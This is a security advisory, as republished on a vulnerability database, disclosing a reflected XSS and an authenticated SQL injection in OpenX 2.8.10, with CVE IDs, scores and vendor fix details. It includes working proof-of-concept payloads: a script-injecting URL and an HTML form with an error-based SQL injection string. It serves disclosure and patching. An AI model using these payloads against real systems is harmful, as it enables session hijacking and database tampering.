Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28649
HistoryOct 22, 2012 - 12:00 a.m.

Multiple vulnerabilities in OpenX

2012-10-2200:00:00
vulners.com
14

Advisory ID: HTB23116
Product: OpenX
Vendor: OpenX
Vulnerable Version(s): 2.8.10 and probably prior
Tested Version: 2.8.10
Vendor Notification: September 19, 2012
Public Disclosure: October 10, 2012
Vulnerability Type: Cross-Site Scripting [CWE-79], SQL Injection [CWE-89]
CVE References: CVE-2012-4989, CVE-2012-4990
CVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Risk Level: Medium
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )


Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenX, which can be exploited to perform Cross-Site Scripting (XSS) and SQL Injection attacks.

1) Cross-Site Scripting (XSS) in OpenX: CVE-2012-4989

Input passed via the "parent" GET parameter to /www/admin/plugin-index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of an affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:

http://[host]/www/admin/plugin-index.php?action=info&group=vastInlineBannerTypeHtml&parent=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

2) SQL Injection in OpenX: CVE-2012-4990

Input passed via the "ids[]" POST parameter to /www/admin/campaign-zone-link.php is not properly sanitised before being used in SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC demonstrates the vulnerability:

<form action="http://[host]/www/admin/campaign-zone-link.php" method="post">
<input type="hidden" name="action" value='link' />
<input type="hidden" name="ids[]" value="z1)) OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) – " />
<input type="hidden" name="clientid" value='[CLIENT_ID]' />
<input type="hidden" name="campaignid" value='[CAMPAIGN_ID]' />
<input type="hidden" name="" value='' />
<input type="hidden" name="" value='' />
<input type="hidden" name="" value='' />
<input type="hidden" name="" value='' />
<input type="submit" id="btn">
</form>

Successful exploitation of this vulnerability requires attacker to be registered, logged-in and have permission to access link zone.


Solution:

Fixed in SVN repository, revision 81823

Replace next files:
[CWE-79] https://svn.openx.org/openx/trunk/lib/templates/admin/plugin-group-view.html
[CWE-89] https://svn.openx.org/openx/trunk/www/admin/campaign-zone-link.php


References:

[1] High-Tech Bridge Advisory HTB23116 - https://www.htbridge.com/advisory/HTB23116 - Multiple vulnerabilities in OpenX.
[2] OpenX - http://www.openx.com - Open source ad serving platform for publishers.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.


Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Related for SECURITYVULNS:DOC:28649